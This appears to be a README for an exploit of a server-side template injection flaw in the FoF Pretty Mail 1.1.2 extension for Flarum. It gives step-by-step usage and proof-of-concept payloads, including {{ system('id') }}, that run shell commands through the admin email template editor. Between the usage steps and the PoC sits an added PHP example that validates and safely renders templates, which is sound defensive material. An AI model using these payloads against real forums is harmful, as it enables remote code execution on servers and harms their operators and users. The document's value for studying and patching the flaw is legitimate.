FoF Pretty Mail SSTI 1.1.2 Exploit for Flarum

Exploit for a critical Server-Side Template Injection (SSTI) vulnerability discovered in the FoF Pretty Mail extension (version 1.1.2) used by Flarum forums. The vulnerability stems from improper sanitization of template variables, allowing attackers with administrative privileges to execute arbitrary code on the server.


Usage:
  1. Obtain administrative access to a Flarum forum with the FoF Pretty Mail extension installed.
  2. Navigate to the extension settings and access the email template editor.
  3. Inject the following payloads into the template:
       {{ 7*7 }} (demonstrates basic template expression evaluation)
       {{ system('id') }} (executes a system command to display user information)
       {{ system('echo "Take The Rose"') }} (executes a custom command)
  4. Save the modified template and trigger an email event (e.g., user registration).
  5. Observe the execution results in the received email, confirming the successful exploitation.
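The mitigation side, as an added example that is not code from the FoF Pretty Mail extension: treat an admin-editable mail template as data and substitute only an allow-list of placeholder names, instead of handing the whole string to a template engine. The placeholder names, the `{{ name }}` syntax and the function names are assumptions for this example.

```php
<?php
// Added example, not FoF Pretty Mail's own code: an admin-editable mail
// template is treated as data. Only bare placeholder names from a fixed
// allow-list are substituted; any other {{ ... }} content is rejected on save.

// Placeholder names the template may use (assumed for this example).
const ALLOWED_PLACEHOLDERS = ['username', 'forum_title', 'reset_url'];

// Returns the problems found in $template; an empty array means it may be stored.
// Every {{ ... }} whose content is not exactly one allowed name is reported,
// so {{ 7*7 }} and {{ system('id') }} are both refused.
function validateMailTemplate(string $template): array
{
    $problems = [];
    preg_match_all('/\{\{(.*?)\}\}/s', $template, $matches);
    foreach ($matches[1] as $expr) {
        $name = trim($expr);
        if (!in_array($name, ALLOWED_PLACEHOLDERS, true)) {
            $problems[] = 'disallowed template expression: {{' . $expr . '}}';
        }
    }
    // Block and comment tags have no legitimate use in a mail body either.
    if (preg_match('/\{[%#]/', $template)) {
        $problems[] = 'template tags ({% ... %} / {# ... #}) are not permitted';
    }
    return $problems;
}

// Renders a validated template by plain substitution with HTML escaping.
// The template string is never passed to a template engine, so nothing in it
// can be evaluated as code.
function renderMailTemplate(string $template, array $values): string
{
    if (validateMailTemplate($template) !== []) {
        throw new InvalidArgumentException('mail template failed validation');
    }
    return preg_replace_callback('/\{\{\s*([a-z_]+)\s*\}\}/', function (array $m) use ($values): string {
        return htmlspecialchars((string) ($values[$m[1]] ?? ''), ENT_QUOTES, 'UTF-8');
    }, $template);
}

// Constructed samples: a benign template and one carrying this README's payloads.
$safe = 'Hello {{ username }}, reset your password at {{ reset_url }}.';
$bad  = 'Hello {{ username }} {{ 7*7 }} {{ system(\'id\') }}';

var_dump(validateMailTemplate($safe) === []);   // the benign template passes the pre-save check
print_r(validateMailTemplate($bad));            // the two injected expressions are reported
echo renderMailTemplate($safe, ['username' => '<b>alice</b>', 'reset_url' => 'https://forum.example/reset']), PHP_EOL;
```

Because substitution happens on the fixed placeholder names only, the admin-supplied template text can never reach an engine that evaluates `{{ ... }}` as an expression.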

POC: Editing the E-mail Template Payload:

{{ 7*7 }}
{{ system('id') }}
{{ system('echo "Take The Rose"') }}

Trigger the reset-password action (or any other action that sends an e-mail) to receive the message. In the e-mail received, the injected expressions have been evaluated on the server and their results appear in the message body.

Disclaimer:

This repository is intended for educational and research purposes only. The exploit is provided to raise awareness about the vulnerability and promote security best practices among Flarum users and developers. Unauthorized use of this exploit against systems without explicit consent is illegal and unethical.